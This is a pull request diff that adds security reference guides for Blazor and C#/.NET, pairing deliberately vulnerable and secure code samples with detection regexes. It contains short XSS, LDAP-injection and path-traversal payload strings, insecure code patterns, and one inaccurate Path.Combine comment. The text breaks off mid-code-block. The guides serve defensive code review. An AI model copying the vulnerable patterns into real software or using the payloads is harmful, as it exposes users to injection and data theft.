### PR TITLE
feat(references): add JVM and .NET ecosystem security guides

### DIFF
--- a/skills/security-audit/references/blazor-security.md
+++ b/skills/security-audit/references/blazor-security.md
@@ -242,7 +242,16 @@ app.MapRazorComponents<App>()
     }
 }
 
-// VULNERABLE: Sensitive data in ProtectedBrowserStorage without encryption
+// VULNERABLE: Storing long-lived or high-value secrets in browser-side
+// Protected*Storage. ProtectedSessionStorage / ProtectedLocalStorage DO
+// encrypt the stored ciphertext using the server-side Data Protection
+// API (keys live on the server, not in the page), so the stored value
+// is opaque to the user and to browser extensions.
+// BUT: the ciphertext is still round-tripped through the browser, so
+// persistence lifetime, cross-tab visibility, and the user's ability
+// to capture the encrypted blob all become part of the threat model.
+// Treat it like a signed cookie — fine for short-lived UI state, not
+// a substitute for a server-side session store for API tokens.
 @inject ProtectedSessionStorage SessionStorage
 
 @code {
@@ -250,7 +259,6 @@ app.MapRazorComponents<App>()
     {
         if (firstRender)
         {
-            // Data is encrypted but key is in the page — not truly secret
             await SessionStorage.SetAsync("apiToken", apiToken);
         }
     }

--- a/skills/security-audit/references/blazor-security.md
+++ b/skills/security-audit/references/blazor-security.md
@@ -1,0 +1,446 @@
+# Blazor Security Patterns
+
+Security patterns, common misconfigurations, and detection regexes for Blazor applications (WebAssembly and Server).
+
+## Authentication & Authorization
+
+### WebAssembly Client-Side Auth Bypass
+
+```csharp
+// VULNERABLE: Authorization logic implemented only on the client (Blazor WASM)
+// The client-side [Authorize] attribute can be bypassed by modifying WASM or
+// calling APIs directly — it is a UX convenience, not a security boundary.
+
+// Pages/Admin/Dashboard.razor
+@page "/admin/dashboard"
+@attribute [Authorize(Roles = "Admin")]
+
+<h1>Admin Dashboard</h1>
+<p>Sensitive admin data: @adminData</p>
+
+@code {
+    private string adminData;
+
+    protected override async Task OnInitializedAsync()
+    {
+        // VULNERABLE: Fetching from unprotected API endpoint
+        adminData = await Http.GetStringAsync("/api/admin/data");
+    }
+}
+
+// On the server, the API has no authorization:
+[ApiController]
+[Route("api/admin")]
+public class AdminApiController : ControllerBase
+{
+    [HttpGet("data")]
+    // Missing [Authorize] — anyone can call this directly
+    public IActionResult GetData() => Ok(new { secret = "sensitive" });
+}
+
+// SECURE: Always enforce authorization on the server API
+[ApiController]
+[Route("api/admin")]
+[Authorize(Roles = "Admin")]   // Server-side enforcement
+public class AdminApiController : ControllerBase
+{
+    [HttpGet("data")]
+    public IActionResult GetData() => Ok(new { secret = "sensitive" });
+}
+
+// SECURE: Blazor WASM component with proper error handling for unauthorized
+@page "/admin/dashboard"
+@attribute [Authorize(Roles = "Admin")]
+@inject AuthenticationStateProvider AuthProvider
+
+<AuthorizeView Roles="Admin">
+    <Authorized>
+        <h1>Admin Dashboard</h1>
+        <p>@adminData</p>
+    </Authorized>
+    <NotAuthorized>
+        <p>Access denied. Administrators only.</p>
+    </NotAuthorized>
+</AuthorizeView>
+
+@code {
+    private string adminData;
+
+    protected override async Task OnInitializedAsync()
+    {
+        try
+        {
+            adminData = await Http.GetStringAsync("/api/admin/data");
+        }
+        catch (HttpRequestException ex) when (ex.StatusCode == System.Net.HttpStatusCode.Forbidden)
+        {
+            adminData = "Access denied";
+        }
+    }
+}
+```
+
+**Detection regex:** `Http\.\w+Async\s*\(\s*"[^"]*(?:admin|secret|internal|private|manage)[^"]*"\s*\)[\s\S]{0,500}(?<!\[Authorize)`
+**Severity:** error
+
+The `[Authorize]` attribute in Blazor WASM only controls UI rendering. An attacker can bypass it by calling the API endpoint directly with any HTTP client. All security-sensitive operations must be authorized on the server.
+
+### [Authorize] Attribute Bypass via Render Mode
+
+```csharp
+// VULNERABLE: Component with [Authorize] rendered in static SSR mode
+// In .NET 8+ with per-component render modes, static SSR components
+// do NOT have access to authentication state by default.
+
+// Pages/Secure.razor
+@page "/secure"
+@attribute [Authorize]
+@rendermode InteractiveServer   // OK — has circuit for auth state
+
+// But if accidentally set to static:
+@page "/secure"
+@attribute [Authorize]
+// No @rendermode — defaults to static SSR, auth attribute may not enforce
+
+// VULNERABLE: Mixing render modes causes auth gaps
+// App.razor
+<Routes @rendermode="InteractiveServer" />
+// But individual pages override:
+@page "/admin"
+@attribute [Authorize]
+@rendermode @(new InteractiveWebAssemblyRenderMode(prerender: true))
+// During prerender, auth state may not be available
+
+// SECURE: Ensure authentication middleware covers all render modes
+// Program.cs
+app.UseAuthentication();
+app.UseAuthorization();
+app.MapRazorComponents<App>()
+   .AddInteractiveServerRenderMode()
+   .AddInteractiveWebAssemblyRenderMode();
+
+// SECURE: Use cascading authentication state
+// App.razor
+<CascadingAuthenticationState>
+    <Router AppAssembly="typeof(App).Assembly">
+        <Found Context="routeData">
+            <AuthorizeRouteView RouteData="routeData"
+                                DefaultLayout="typeof(MainLayout)">
+                <NotAuthorized>
+                    <RedirectToLogin />
+                </NotAuthorized>
+            </AuthorizeRouteView>
+        </Found>
+    </Router>
+</CascadingAuthenticationState>
+```
+
+**Detection regex:** `\[Authorize\][\s\S]{0,200}@rendermode\s+@?\(?new\s+Interactive\w*RenderMode\s*\(\s*prerender\s*:\s*true\s*\)`
+**Severity:** warning
+
+## Injection
+
+### JavaScript Interop Injection
+
+```csharp
+// VULNERABLE: Passing unsanitized user input to JS interop
+@inject IJSRuntime JS
+
+<input @bind="userInput" />
+<button @onclick="Execute">Run</button>
+
+@code {
+    private string userInput = "";
+
+    private async Task Execute()
+    {
+        // Attacker enters: "); alert(document.cookie); //
+        await JS.InvokeVoidAsync("eval", userInput);
+    }
+}
+
+// VULNERABLE: Building JS dynamically with user input
+@code {
+    private async Task ShowMessage(string message)
+    {
+        // XSS if message contains: </script><script>alert(1)</script>
+        await JS.InvokeVoidAsync("eval", $"alert('{message}')");
+    }
+}
+
+// VULNERABLE: Invoking a JS function that uses innerHTML
+// wwwroot/js/app.js:
+// window.renderHtml = (elementId, html) => {
+//     document.getElementById(elementId).innerHTML = html;  // XSS sink
+// };
+
+@code {
+    private async Task RenderComment(string commentHtml)
+    {
+        await JS.InvokeVoidAsync("renderHtml", "comment-box", commentHtml);
+    }
+}
+
+// SECURE: Use parameterized JS calls with safe functions
+@code {
+    private async Task ShowMessage(string message)
+    {
+        // Pass data as parameter, use safe JS function
+        await JS.InvokeVoidAsync("showNotification", message);
+    }
+}
+
+// wwwroot/js/app.js:
+// window.showNotification = (message) => {
+//     const el = document.getElementById("notification");
+//     el.textContent = message;  // textContent is safe — no HTML parsing
+// };
+
+// SECURE: Validate and sanitize before interop
+@code {
+    private static readonly Regex SafePattern = new(@"^[\w\s.,!?-]+$");
+
+    private async Task ShowMessage(string message)
+    {
+        if (!SafePattern.IsMatch(message))
+        {
+            return;  // Reject suspicious input
+        }
+        await JS.InvokeVoidAsync("showNotification", message);
+    }
+}
+```
+
+**Detection regex:** `InvokeVoidAsync\s*\(\s*"eval"|InvokeAsync\s*\(\s*"eval"|InvokeVoidAsync\s*\(\s*"[^"]*"\s*,\s*\$"|InvokeVoidAsync\s*\([^)]*innerHTML`
+**Severity:** error
+
+## Data Exposure
+
+### Server-Side Blazor State Management
+
+```csharp
+// VULNERABLE: Storing sensitive data in component state (Blazor Server)
+// In Blazor Server, component state lives on the server in a circuit.
+// However, state can leak through prerendering, error messages, or
+// reconnection scenarios.
+
+@page "/account"
+@attribute [Authorize]
+
+@code {
+    // VULNERABLE: Full credit card stored in component state
+    private string creditCardNumber = "";
+    private string cvv = "";
+
+    // State persisted across reconnections — if circuit is hijacked,
+    // attacker gets access to all component state
+    protected override async Task OnInitializedAsync()
+    {
+        var user = await UserService.GetCurrentUser();
+        creditCardNumber = user.CreditCard;  // Full CC in memory
+        cvv = user.Cvv;                      // CVV in memory
+    }
+}
+
+// VULNERABLE: Sensitive data in ProtectedBrowserStorage without encryption
+@inject ProtectedSessionStorage SessionStorage
+
+@code {
+    protected override async Task OnAfterRenderAsync(bool firstRender)
+    {
+        if (firstRender)
+        {
+            // Data is encrypted but key is in the page — not truly secret
+            await SessionStorage.SetAsync("apiToken", apiToken);
+        }
+    }
+}
+
+// SECURE: Minimize sensitive data in component state
+@page "/account"
+@attribute [Authorize]
+
+@code {
+    private string maskedCardNumber = "";
+    // Only store masked version
+    protected override async Task OnInitializedAsync()
+    {
+        var user = await UserService.GetCurrentUser();
+        maskedCardNumber = "****-****-****-" + user.CreditCard[^4..];
+        // Never store CVV in component state
+    }
+}
+
+// SECURE: Use server-side session for sensitive operations
+@code {
+    private async Task ProcessPayment()
+    {
+        // Sensitive data stays on server, never in component state
+        var result = await PaymentService.ChargeCurrentUser(amount);
+    }
+}
+```
+
+**Detection regex:** `(?:private|protected|public)\s+string\s+(?:creditCard|cvv|ssn|password|secret|token|apiKey)\s*=|SessionStorage\.SetAsync\s*\(\s*"(?:token|secret|password|apiKey|creditCard)`
+**Severity:** warning
+
+### Component Lifecycle Data Exposure
+
+```csharp
+// VULNERABLE: OnInitializedAsync fetches data that leaks via prerendering
+@page "/dashboard"
+@attribute [Authorize]
+
+@code {
+    private List<SensitiveRecord> records;
+
+    // During prerendering, this runs on the server and embeds data
+    // into the initial HTML response — visible in page source
+    protected override async Task OnInitializedAsync()
+    {
+        records = await SensitiveDataService.GetRecords();
+        // If prerendering is enabled, this data is serialized into
+        // the __blazor-ssr state and visible to anyone viewing source
+    }
+}
+
+// SECURE: Defer sensitive data loading to OnAfterRenderAsync
+@page "/dashboard"
+@attribute [Authorize]
+
+@code {
+    private List<SensitiveRecord>? records;
+    private bool isLoading = true;
+
+    // OnAfterRenderAsync does NOT run during prerendering
+    protected override async Task OnAfterRenderAsync(bool firstRender)
+    {
+        if (firstRender)
+        {
+            records = await SensitiveDataService.GetRecords();
+            isLoading = false;
+            StateHasChanged();
+        }
+    }
+}
+
+// ALTERNATIVE: Disable prerendering for sensitive pages
+@page "/dashboard"
+@attribute [Authorize]
+@rendermode @(new InteractiveServerRenderMode(prerender: false))
+
+@code {
+    private List<SensitiveRecord> records;
+
+    protected override async Task OnInitializedAsync()
+    {
+        records = await SensitiveDataService.GetRecords();
+    }
+}
+```
+
+**Detection regex:** `OnInitializedAsync[\s\S]{0,300}(?:Sensitive|Secret|Private|Confidential|GetRecords|GetCredentials|GetTokens)`
+**Severity:** warning
+
+### Render Mode Security Implications
+
+```csharp
+// UNDERSTANDING RENDER MODES AND SECURITY:
+//
+// Static SSR: Server renders HTML, sends to client. No interactivity.
+//   Security: Auth state may not be enforced without middleware.
+//
+// Interactive Server (Blazor Server): UI updates via SignalR circuit.
+//   Security: State lives on server. Circuit can be hijacked if SignalR
+//   connection is compromised. DoS via many open circuits.
+//
+// Interactive WebAssembly (Blazor WASM): Runs in browser.
+//   Security: ALL client code is visible. Auth is UX only.
+//   API must enforce all security. Assembly can be decompiled.
+//
+// Interactive Auto: Server first, then WASM after download.
+//   Security: Combines both threat models. Must protect against both.
+
+// VULNERABLE: Security-critical logic in a WASM component
+// Shared/AdminPanel.razor
+@rendermode InteractiveWebAssembly
+
+@code {
+    // This code runs in the browser — attacker can modify it
+    private bool IsAuthorized()
+    {
+        // Client-side only check — trivially bypassed
+        return currentUser.Role == "Admin";
+    }
+
+    private async Task DeleteAllUsers()
+    {
+        if (IsAuthorized())
+        {
+            await Http.DeleteAsync("/api/users/all");
+        }
+    }
+}
+
+// SECURE: Server-enforced authorization with appropriate render mode
+@rendermode InteractiveServer  // Runs on server — code not exposed
+
+@code {
+    [Inject] private AuthenticationStateProvider AuthProvider { get; set; }
+
+    private async Task DeleteAllUsers()
+    {
+        var authState = await AuthProvider.GetAuthenticationStateAsync();
+        if (!authState.User.IsInRole("Admin"))
+        {
+            throw new UnauthorizedAccessException();
+        }
+        await UserService.DeleteAllUsers();  // Server-side service call
+    }
+}
+```
+
+**Detection regex:** `@rendermode\s+Interactive(?:WebAssembly|Auto)[\s\S]{0,500}(?:Delete|Remove|Admin|Manage|Transfer|Approve)`
+**Severity:** warning
+
+## Detection Patterns for Blazor
+
+```csharp
+// Grep patterns for Blazor security issues:
+string[] blazorPatterns = {
+    @"InvokeVoidAsync\s*\(\s*""eval""",            // JS interop eval
+    @"Http\.\w+Async.*admin.*(?<!\[Authorize)",     // Unprotected API call
+    @"@rendermode\s+InteractiveWebAssembly",        // WASM — verify server auth
+    @"(MarkupString)\s*\w+",                        // Raw HTML rendering
+    @"ProtectedSessionStorage.*token|secret",       // Sensitive data in storage
+    @"creditCard|cvv|ssn.*=\s*""",                  // Sensitive data in state
+    @"OnInitializedAsync.*Sensitive",               // Data leak via prerender
+    @"\[Authorize\].*prerender:\s*true",            // Auth with prerender
+    @"innerHTML",                                    // DOM XSS via interop
+};
+```
+
+---
+
+## Remediation Priority
+
+| Finding | Severity | Remediation Timeline | Effort |
+|---------|----------|---------------------|--------|
+| Client-side auth bypass (SA-BLAZOR-01) | Critical | Immediate | Medium |
+| JS interop injection (SA-BLAZOR-03) | Critical | Immediate | Medium |
+| Sensitive state exposure (SA-BLAZOR-02) | High | 1 week | Medium |
+| [Authorize] with prerender (SA-BLAZOR-04) | High | 1 week | Low |
+| Lifecycle data exposure (SA-BLAZOR-05) | Medium | 1 month | Low |
+| Render mode implications (SA-BLAZOR-06) | Medium | 1 month | Medium |
+
+## Related References
+
+- `owasp-top10.md` — OWASP Top 10 mapping
+- `dotnet-security.md` — ASP.NET Core patterns (middleware, EF, Razor)
+- `spring-security.md` — Comparison with Spring Security patterns
+
+## Changelog
+
+| Date | Change | Reason |
+|------|--------|--------|
+| 2026-03-31 | Initial release | Phase 3 — framework security references |

--- a/skills/security-audit/references/csharp-security-features.md
+++ b/skills/security-audit/references/csharp-security-features.md
@@ -1,0 +1,688 @@
+# C# Security Features by Version
+
+Modern C# versions introduce language features and API improvements that directly improve security when used correctly. This reference documents security-relevant features and common vulnerability patterns from C# 9 through C# 12, targeting .NET 5 through .NET 8.
+
+## Core C# Security Patterns
+
+### BinaryFormatter Insecure Deserialization
+
+`BinaryFormatter` is the most dangerous serialization mechanism in .NET. It deserializes arbitrary types and can lead to remote code execution through gadget chains.
+
+```csharp
+// VULNERABLE: BinaryFormatter on untrusted input
+BinaryFormatter formatter = new BinaryFormatter();
+object obj = formatter.Deserialize(request.Body); // RCE via gadget chains
+```
+
+```csharp
+// SECURE: Use System.Text.Json with explicit types
+var options = new JsonSerializerOptions
+{
+    PropertyNameCaseInsensitive = true,
+    DefaultIgnoreCondition = JsonIgnoreCondition.WhenWritingNull
+};
+UserDto user = JsonSerializer.Deserialize<UserDto>(request.Body, options);
+
+// SECURE: Use MessagePack with strict mode for binary serialization
+var options = MessagePackSerializerOptions.Standard
+    .WithSecurity(MessagePackSecurity.UntrustedData);
+UserDto user = MessagePackSerializer.Deserialize<UserDto>(data, options);
+```
+
+**Security implication:** `BinaryFormatter` (CWE-502) enables remote code execution through .NET gadget chains (ysoserial.net). Microsoft has marked it as obsolete in .NET 5+ and removed it from .NET 9. Never use `BinaryFormatter` on untrusted data. Migrate to `System.Text.Json` or `MessagePack`.
+
+**Detection regex:** `new\s+BinaryFormatter\s*\(`
+
+---
+
+### NetDataContractSerializer Deserialization
+
+`NetDataContractSerializer` embeds full .NET type information in the serialized data, enabling type confusion and code execution attacks.
+
+```csharp
+// VULNERABLE: NetDataContractSerializer on untrusted input
+var serializer = new NetDataContractSerializer();
+object obj = serializer.Deserialize(xmlReader); // Type info from attacker
+
+// VULNERABLE: DataContractSerializer with untrusted known types
+var knownTypes = GetTypesFromConfig(); // Attacker controls the type list
+var serializer = new DataContractSerializer(typeof(object), knownTypes);
+```
+
+```csharp
+// SECURE: DataContractSerializer with explicit, fixed known types
+var knownTypes = new[] { typeof(UserDto), typeof(OrderDto) };
+var serializer = new DataContractSerializer(typeof(UserDto), knownTypes);
+UserDto user = (UserDto)serializer.ReadObject(xmlReader);
+
+// SECURE: Use System.Text.Json
+UserDto user = JsonSerializer.Deserialize<UserDto>(json);
+```
+
+**Security implication:** `NetDataContractSerializer` (CWE-502) includes .NET type information in serialized data, allowing attackers to specify arbitrary types. This enables the same gadget chain attacks as `BinaryFormatter`. Always use serializers with explicit type binding.
+
+**Detection regex:** `new\s+NetDataContractSerializer\s*\(`
+
+---
+
+### SQL Injection in Entity Framework
+
+Entity Framework Core's `FromSqlRaw` and `FromSqlInterpolated` have different safety characteristics. String interpolation in `FromSqlRaw` is dangerous.
+
+```csharp
+// VULNERABLE: String concatenation in FromSqlRaw
+string username = request.Query["username"];
+var users = context.Users
+    .FromSqlRaw("SELECT * FROM Users WHERE Username = '" + username + "'")
+    .ToList();
+
+// VULNERABLE: String interpolation in FromSqlRaw (NOT parameterized)
+var users = context.Users
+    .FromSqlRaw($"SELECT * FROM Users WHERE Username = '{username}'")
+    .ToList();
+```
+
+```csharp
+// SECURE: Use FromSqlInterpolated (auto-parameterizes)
+string username = request.Query["username"];
+var users = context.Users
+    .FromSqlInterpolated($"SELECT * FROM Users WHERE Username = {username}")
+    .ToList();
+
+// SECURE: Use FromSqlRaw with explicit parameters
+var users = context.Users
+    .FromSqlRaw("SELECT * FROM Users WHERE Username = {0}", username)
+    .ToList();
+
+// SECURE: Use LINQ queries (always parameterized)
+var users = context.Users
+    .Where(u => u.Username == username)
+    .ToList();
+```
+
+**Security implication:** `FromSqlRaw` with string interpolation or concatenation (CWE-89) creates SQL injection vulnerabilities. The critical distinction is that `FromSqlInterpolated` converts `FormattableString` interpolation into parameterized queries, while `FromSqlRaw` with `$""` passes a plain string. Always prefer LINQ queries or `FromSqlInterpolated`.
+
+**Detection regex:** `FromSqlRaw\s*\(\s*\$`
+
+---
+
+### LDAP Injection
+
+Constructing LDAP queries from user input without sanitization enables LDAP injection attacks.
+
+```csharp
+// VULNERABLE: String concatenation in LDAP filter
+string username = request.Query["user"];
+string filter = $"(&(objectClass=user)(sAMAccountName={username}))";
+DirectorySearcher searcher = new DirectorySearcher(filter);
+SearchResultCollection results = searcher.FindAll();
+// Attacker sends: *)(objectClass=*) to dump all entries
+```
+
+```csharp
+// SECURE: Escape LDAP special characters
+string username = request.Query["user"];
+string safeUsername = LdapEscape(username);
+string filter = $"(&(objectClass=user)(sAMAccountName={safeUsername}))";
+
+static string LdapEscape(string input)
+{
+    return input
+        .Replace("\\", "\\5c")
+        .Replace("*", "\\2a")
+        .Replace("(", "\\28")
+        .Replace(")", "\\29")
+        .Replace("\0", "\\00");
+}
+
+// SECURE: Use Novell.Directory.Ldap with parameterized searches
+var filter = LdapFilter.Create("(&(objectClass=user)(sAMAccountName=?))", username);
+```
+
+**Security implication:** LDAP injection (CWE-90) allows attackers to modify LDAP queries to bypass authentication, enumerate users, or extract directory data. Always escape LDAP special characters (`*`, `(`, `)`, `\`, NUL) or use parameterized query libraries.
+
+**Detection regex:** `DirectorySearcher\s*\(\s*\$`
+
+---
+
+### XML External Entities (XXE)
+
+`XmlDocument` with default settings in older .NET versions is vulnerable to XXE. `XmlReader` with secure defaults is the recommended approach.
+
+```csharp
+// VULNERABLE: XmlDocument with ProhibitDtd=false or .NET < 4.5.2
+XmlDocument doc = new XmlDocument();
+doc.XmlResolver = new XmlUrlResolver(); // Enables external entity resolution
+doc.LoadXml(userInput);
+
+// VULNERABLE: XmlTextReader without DtdProcessing disabled
+XmlTextReader reader = new XmlTextReader(stream);
+// DtdProcessing defaults to Parse in older .NET
+```
+
+```csharp
+// SECURE: XmlDocument with null resolver (.NET 4.5.2+, default is secure)
+XmlDocument doc = new XmlDocument();
+doc.XmlResolver = null; // Explicitly disable external entity resolution
+doc.LoadXml(userInput);
+
+// SECURE: XmlReader with secure settings
+var settings = new XmlReaderSettings
+{
+    DtdProcessing = DtdProcessing.Prohibit,
+    XmlResolver = null,
+    MaxCharactersFromEntities = 1024
+};
+using XmlReader reader = XmlReader.Create(stream, settings);
+
+// SECURE: Use LINQ to XML (secure by default in .NET Core)
+XDocument doc = XDocument.Parse(userInput);
+```
+
+**Security implication:** XXE (CWE-611) in .NET occurs when XML parsers resolve external entities. While .NET Core / .NET 5+ defaults are generally secure, explicitly setting `XmlResolver = null` and `DtdProcessing = DtdProcessing.Prohibit` provides defense in depth. Always prefer `XmlReader` with explicit secure settings.
+
+**Detection regex:** `new\s+XmlDocument\s*\(`
+
+---
+
+### Command Injection via Process.Start
+
+Using `Process.Start` with user-controlled arguments and `UseShellExecute = true` enables command injection.
+
+```csharp
+// VULNERABLE: User input in process arguments with shell execution
+string filename = request.Query["file"];
+Process.Start("cmd.exe", $"/c type {filename}");
+
+// VULNERABLE: UseShellExecute with user input
+var psi = new ProcessStartInfo
+{
+    FileName = userInput,
+    UseShellExecute = true // Interprets shell metacharacters
+};
+Process.Start(psi);
+```
+
+```csharp
+// SECURE: Validate input and avoid shell execution
+string filename = request.Query["file"];
+if (!Regex.IsMatch(filename, @"^[a-zA-Z0-9_\-]+\.(txt|csv|pdf)$"))
+{
+    throw new ArgumentException("Invalid filename");
+}
+
+var psi = new ProcessStartInfo
+{
+    FileName = "/usr/bin/cat",
+    Arguments = filename,
+    UseShellExecute = false, // Do not pass through shell
+    RedirectStandardOutput = true,
+    CreateNoWindow = true
+};
+using var process = Process.Start(psi);
+
+// SECURE: Use .NET APIs instead of shell commands
+string content = await File.ReadAllTextAsync(validatedPath);
+```
+
+**Security implication:** Command injection (CWE-78) via `Process.Start` with `UseShellExecute = true` passes arguments through the OS shell, enabling metacharacter injection. Always set `UseShellExecute = false`, validate arguments against strict patterns, and prefer .NET library APIs over shell commands.
+
+**Detection regex:** `Process\.Start\s*\(`
+
+---
+
+### Path Traversal
+
+Constructing file paths from user input without validation allows directory traversal.
+
+```csharp
+// VULNERABLE: Direct use of user input in file paths
+string filename = request.Query["file"];
+string path = Path.Combine("/uploads", filename);
+byte[] content = File.ReadAllBytes(path);
+// Path.Combine("/uploads", "../etc/passwd") = "../etc/passwd" (!!)
+// When the second argument is a rooted path, Combine ignores the first!
+```
+
+```csharp
+// SECURE: Validate resolved path stays within allowed directory
+string filename = request.Query["file"];
+string baseDir = Path.GetFullPath("/uploads");
+string fullPath = Path.GetFullPath(Path.Combine(baseDir, filename));
+
+if (!fullPath.StartsWith(baseDir + Path.DirectorySeparatorChar))
+{
+    throw new SecurityException("Path traversal detected");
+}
+byte[] content = File.ReadAllBytes(fullPath);
+
+// SECURE: Use Path.GetFileName to strip directory components
+string safeFilename = Path.GetFileName(filename); // strips all path components
+string fullPath = Path.Combine(baseDir, safeFilename);
+```
+
+**Security implication:** Path traversal (CWE-22) in .NET is particularly dangerous because `Path.Combine` has a surprising behavior: if the second argument is an absolute path, it ignores the first argument entirely. Always use `Path.GetFullPath` and verify the result starts with the expected base directory.
+
+**Detection regex:** `Path\.Combine\s*\([^)]*request\.|Path\.Combine\s*\([^)]*Request\.`
+
+---
+
+### CORS Misconfiguration in ASP.NET Core
+
+Overly permissive CORS policies allow cross-origin attacks against authenticated endpoints.
+
+```csharp
+// VULNERABLE: Allow any origin
+builder.Services.AddCors(options =>
+{
+    options.AddDefaultPolicy(policy =>
+    {
+        policy.AllowAnyOrigin()
+              .AllowAnyMethod()
+              .AllowAnyHeader();
+    });
+});
+
+// VULNERABLE: Reflecting Origin header as allowed origin
+app.Use(async (context, next) =>
+{
+    var origin = context.Request.Headers["Origin"].ToString();
+    context.Response.Headers.Add("Access-Control-Allow-Origin", origin);
+    context.Response.Headers.Add("Access-Control-Allow-Credentials", "true");
+    await next();
+});
+```
+
+```csharp
+// SECURE: Explicitly allowlist trusted origins
+builder.Services.AddCors(options =>
+{
+    options.AddDefaultPolicy(policy =>
+    {
+        policy.WithOrigins(
+                "https://app.example.com",
+                "https://admin.example.com")
+              .WithMethods("GET", "POST")
+              .WithHeaders("Content-Type", "Authorization")
+              .AllowCredentials();
+    });
+});
+```
+
+**Security implication:** CORS misconfiguration (CWE-346) with `AllowAnyOrigin` combined with `AllowCredentials` allows any website to make authenticated requests on behalf of users. Always specify explicit origins, methods, and headers. Never reflect the `Origin` header as the allowed origin.
+
+**Detection regex:** `AllowAnyOrigin\s*\(`
+
+---
+
+### Weak Cryptography
+
+Use of broken or deprecated cryptographic algorithms.
+
+```csharp
+// VULNERABLE: MD5 is broken
+using var md5 = MD5.Create();
+byte[] hash = md5.ComputeHash(data);
+
+// VULNERABLE: SHA-1 is deprecated for security use
+using var sha1 = SHA1.Create();
+byte[] hash = sha1.ComputeHash(data);
+
+// VULNERABLE: DES is broken (56-bit key)
+using var des = DESCryptoServiceProvider.Create();
+
+// VULNERABLE: TripleDES is deprecated
+using var tdes = TripleDESCryptoServiceProvider.Create();
+```
+
+```csharp
+// SECURE: SHA-256 or stronger
+using var sha256 = SHA256.Create();
+byte[] hash = sha256.ComputeHash(data);
+
+// SECURE: AES-GCM for authenticated encryption (.NET Core 3.0+)
+using var aesGcm = new AesGcm(key, tagSizeInBytes: 16);
+aesGcm.Encrypt(nonce, plaintext, ciphertext, tag);
+
+// SECURE: Use BCrypt/Argon2 for passwords (via library)
+string hash = BCrypt.Net.BCrypt.HashPassword(password, workFactor: 12);
+```
+
+**Security implication:** MD5 (CWE-328) and SHA-1 are vulnerable to collision attacks. DES (CWE-327) has insufficient key length. Always use SHA-256+ for hashing and AES-GCM for encryption. Use BCrypt or Argon2 for password hashing.
+
+**Detection regex (MD5):** `MD5\.Create\s*\(`
+**Detection regex (SHA-1):** `SHA1\.Create\s*\(`
+**Detection regex (DES):** `DESCryptoServiceProvider`
+
+---
+
+### Insecure Random Number Generation
+
+`System.Random` is not cryptographically secure and must not be used for security-sensitive operations.
+
+```csharp
+// VULNERABLE: System.Random is predictable
+var random = new Random();
+string token = Convert.ToBase64String(
+    BitConverter.GetBytes(random.Next()));
+
+// VULNERABLE: System.Random seeded with time
+var random = new Random(DateTime.Now.Millisecond);
+int otp = random.Next(100000, 999999);
+```
+
+```csharp
+// SECURE: RandomNumberGenerator for security-sensitive operations
+byte[] tokenBytes = RandomNumberGenerator.GetBytes(32);
+string token = Convert.ToBase64String(tokenBytes);
+
+// SECURE: Cryptographic random integer
+int otp = RandomNumberGenerator.GetInt32(100000, 999999);
+
+// SECURE: .NET 6+ simplified API
+string token = Convert.ToHexString(RandomNumberGenerator.GetBytes(32));
+```
+
+**Security implication:** `System.Random` (CWE-338) uses a predictable PRNG algorithm. If an attacker can observe outputs or guess the seed, they can predict future values, compromising tokens, OTPs, CSRF tokens, and other security-critical random values. Always use `RandomNumberGenerator` for security purposes.
+
+**Detection regex:** `new\s+Random\s*\(`
+
+---
+
+## C# 9+
+
+### Records for Immutable DTOs
+
+Records provide value-based equality and immutability, making them ideal for data transfer objects that should not be modified after validation.
+
+```csharp
+// VULNERABLE: Mutable DTO allows post-validation tampering
+public class LoginRequest
+{
+    public string Username { get; set; }
+    public string Role { get; set; }
+}
+
+var request = Deserialize<LoginRequest>(input);
+Validate(request);
+request.Role = "admin"; // Modified after validation (TOCTOU)
+```
+
+```csharp
+// SECURE: Record is immutable after construction
+public record LoginRequest(string Username, string Role)
+{
+    // Validation in constructor
+    public LoginRequest
+    {
+        ArgumentNullException.ThrowIfNull(Username);
+        ArgumentNullException.ThrowIfNull(Role);
+        if (!new[] { "user", "editor", "viewer" }.Contains(Role))
+            throw new ArgumentException($"Invalid role: {Role}");
+    }
+}
+
+var request = Deserialize<LoginRequest>(input);
+// request.Role = "admin"; // Compilation error — init-only
+```
+
+**Security implication:** Records enforce immutability through init-only properties, preventing TOCTOU (CWE-367) attacks where data is modified between validation and use. The positional syntax ensures all required fields are set at construction time.
+
+---
+
+### Init-Only Properties
+
+`init` accessors prevent modification after object initialization.
+
+```csharp
+// VULNERABLE: Regular setter allows mutation after creation
+public class SecurityConfig
+{
+    public string EncryptionKey { get; set; }
+    public bool RequireSsl { get; set; }
+}
+
+// Someone accidentally resets in middleware
+config.RequireSsl = false;
+```
+
+```csharp
+// SECURE: Init-only setters prevent post-initialization changes
+public class SecurityConfig
+{
+    public required string EncryptionKey { get; init; }
+    public required bool RequireSsl { get; init; }
+}
+
+var config = new SecurityConfig
+{
+    EncryptionKey = Environment.GetEnvironmentVariable("ENC_KEY")!,
+    RequireSsl = true
+};
+// config.RequireSsl = false; // Compilation error
+```
+
+**Security implication:** Init-only properties prevent accidental or malicious modification of security configuration after initialization, reducing the attack surface for configuration tampering.
+
+---
+
+## C# 10+
+
+### File-Scoped Namespaces and Global Usings Security
+
+Global usings can inadvertently expose dangerous APIs across the entire project.
+
+```csharp
+// VULNERABLE: Global using exposes dangerous APIs everywhere
+// GlobalUsings.cs
+global using System.Diagnostics; // Process.Start available everywhere
+global using System.Runtime.Serialization.Formatters.Binary; // BinaryFormatter everywhere
+global using System.Reflection; // Reflection APIs everywhere
+```
+
+```csharp
+// SECURE: Only globalize safe, commonly needed namespaces
+// GlobalUsings.cs
+global using System;
+global using System.Collections.Generic;
+global using System.Linq;
+global using System.Threading.Tasks;
+global using Microsoft.Extensions.Logging;
+
+// Import dangerous namespaces only where needed, per file
+// In ProcessService.cs only:
+using System.Diagnostics;
+```
+
+**Security implication:** Global usings reduce the friction of using dangerous APIs. If `System.Diagnostics` is a global using, any file can call `Process.Start` without an explicit import — making it harder to audit for command injection during code review. Restrict global usings to safe, utility namespaces.
+
+---
+
+### Constant Interpolated Strings
+
+C# 10 allows `const` interpolated strings, which improves security by ensuring string values are compile-time constants.
+
+```csharp
+// SECURE: Const interpolated strings for configuration keys
+const string AppName = "MyApp";
+const string ConfigPrefix = $"{AppName}:Security";
+const string EncryptionKeyPath = $"{ConfigPrefix}:EncryptionKey";
+// These cannot be modified at runtime
+```
+
+**Security implication:** Constant strings prevent runtime tampering with configuration paths and keys, providing compile-time guarantees about their values.
+
+---
+
+## C# 11+
+
+### Required Members for Initialization Safety
+
+The `required` modifier ensures that properties are set during initialization, preventing null-reference security issues.
+
+```csharp
